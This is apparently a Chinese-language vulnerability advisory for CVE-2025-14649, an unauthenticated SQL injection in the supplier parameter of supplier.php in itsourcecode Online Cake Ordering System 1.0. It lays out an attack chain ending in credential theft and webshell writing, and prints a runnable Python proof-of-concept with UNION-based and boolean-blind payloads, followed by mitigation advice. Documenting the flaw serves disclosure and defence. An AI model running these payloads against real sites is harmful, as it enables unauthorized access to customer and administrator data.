CVE-2025-14649 itsourcecode Online Cake Ordering System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14649

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Online Cake Ordering System 1.0

漏洞概述

CVE-2025-14649是itsourcecode公司开发的在线蛋糕订购系统1.0版本中的一个高危安全漏洞。该漏洞存在于系统的supplier.php文件中，由于对用户输入的supplier参数缺乏有效的输入验证和过滤，攻击者可以通过构造恶意的SQL语句实现SQL注入攻击。CVSS评分达到7.3分，属于高危级别漏洞，攻击向量为网络层面，攻击者无需任何认证权限即可发起攻击，且无需用户交互。该漏洞于2025年12月14日被披露，目前公开的漏洞利用代码（PoC）已经存在，攻击者可以远程利用此漏洞获取数据库中的敏感信息，包括用户数据、订单信息、管理员凭据等。在严重情况下，攻击者可能通过SQL注入获取系统管理员权限，进而控制整个Web服务器。由于该系统主要用于商业蛋糕订购场景，泄露的数据可能包含用户的个人信息、地址和支付相关数据，存在严重的数据泄露风险。

技术细节

该SQL注入漏洞位于Online Cake Ordering System 1.0的/cakeshop/supplier.php文件中。漏洞产生的根本原因是在处理supplier参数时，应用程序直接将用户输入拼接到SQL查询语句中，而没有使用参数化查询或预编译语句进行防护。攻击者可以通过在supplier参数中注入SQL恶意代码，如使用UNION SELECT、布尔盲注、时间盲注等技术来提取数据库中的敏感信息。由于该参数在数据库查询前没有任何过滤或转义机制，特殊字符如单引号、双引号以及SQL关键字可以被直接传递到后端数据库执行。根据CVSS 3.1向量AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L分析，攻击者可以从网络远程发起攻击，利用复杂度低且无需特殊权限。成功利用此漏洞可导致机密性、完整性和可用性三个方面都受到低等级影响，攻击者能够读取数据库中的敏感数据、修改数据内容，甚至在某些配置不当的情况下可能实现远程代码执行。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的itsourcecode Online Cake Ordering System 1.0，并定位到存在漏洞的页面/cakeshop/supplier.php

STEP 2

步骤2: 漏洞探测

攻击者通过在supplier参数中注入单引号'来测试SQL注入漏洞是否存在，观察返回的数据库错误信息

STEP 3

步骤3: 构造注入载荷

根据数据库类型和响应特征，构造合适的SQL注入载荷，如UNION SELECT语句或布尔盲注payload

STEP 4

步骤4: 数据提取

利用SQL注入漏洞逐步提取数据库中的敏感信息，包括用户表、管理员凭据、订单数据等

STEP 5

步骤5: 权限提升

如果获取到管理员凭据，攻击者可以登录后台管理系统，进一步控制整个应用系统

STEP 6

步骤6: 持久化控制

在某些情况下，攻击者可能通过SQL注入写入Webshell，实现远程代码执行和持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14649 SQL Injection PoC
# Target: itsourcecode Online Cake Ordering System 1.0
# File: /cakeshop/supplier.php
# Parameter: supplier

def exploit_sqli(target_url):
    """
    SQL Injection exploitation using UNION-based technique
    """
    # Vulnerable endpoint
    vuln_url = f"{target_url}/cakeshop/supplier.php"
    
    # Payload for SQL injection - basic test with single quote
    payload_test = "'"
    
    # UNION-based payload to extract database information
    payload_union = "' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -"
    
    # Boolean-based blind SQL injection payload
    payload_boolean = "' AND 1=1-- -"
    payload_boolean_false = "' AND 1=2-- -"
    
    print(f"[*] Testing vulnerable parameter: supplier")
    print(f"[*] Target URL: {vuln_url}")
    
    # Test basic injection
    params = {"supplier": payload_test}
    try:
        response = requests.get(vuln_url, params=params, timeout=10)
        if "error" in response.text.lower() or "sql" in response.text.lower():
            print("[+] Potential SQL injection detected!")
    except Exception as e:
        print(f"[-] Request failed: {e}")
    
    # Test UNION-based injection
    params_union = {"supplier": payload_union}
    try:
        response = requests.get(vuln_url, params=params_union, timeout=10)
        if response.status_code == 200:
            print("[+] UNION injection payload sent successfully")
            print(f"[+] Response length: {len(response.text)} bytes")
    except Exception as e:
        print(f"[-] UNION injection failed: {e}")
    
    # Test boolean-based blind injection
    params_true = {"supplier": payload_boolean}
    params_false = {"supplier": payload_boolean_false}
    try:
        resp_true = requests.get(vuln_url, params=params_true, timeout=10)
        resp_false = requests.get(vuln_url, params=params_false, timeout=10)
        if len(resp_true.text) != len(resp_false.text):
            print("[+] Boolean-based blind SQL injection confirmed!")
    except Exception as e:
        print(f"[-] Blind injection test failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_sqli(target)

影响范围

itsourcecode Online Cake Ordering System 1.0

防御指南

临时缓解措施

在厂商发布正式修复版本之前，建议采取以下临时缓解措施：1）使用Web应用防火墙规则阻止包含SQL特殊字符（如单引号、双破折号、UNION等）的请求；2）临时禁用supplier.php页面的访问或限制只有授权用户才能访问；3）在数据库层面实施严格的输入过滤，删除或转义SQL关键字；4）监控数据库访问日志，及时发现异常的SQL查询行为；5）考虑部署入侵检测系统（IDS）监控针对该漏洞的扫描和利用尝试；6）对现有系统进行安全加固，确保所有数据库查询都使用参数化查询或ORM框架。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14649
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14649
3 Details https://www.cvedetails.com/cve/CVE-2025-14649/
4 VulDB https://vuldb.com/cve/CVE-2025-14649
5 Link https://github.com/yihaofuweng/cve/issues/60
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.336382
8 Link https://vuldb.com/?id.336382
9 Link https://vuldb.com/?submit.710247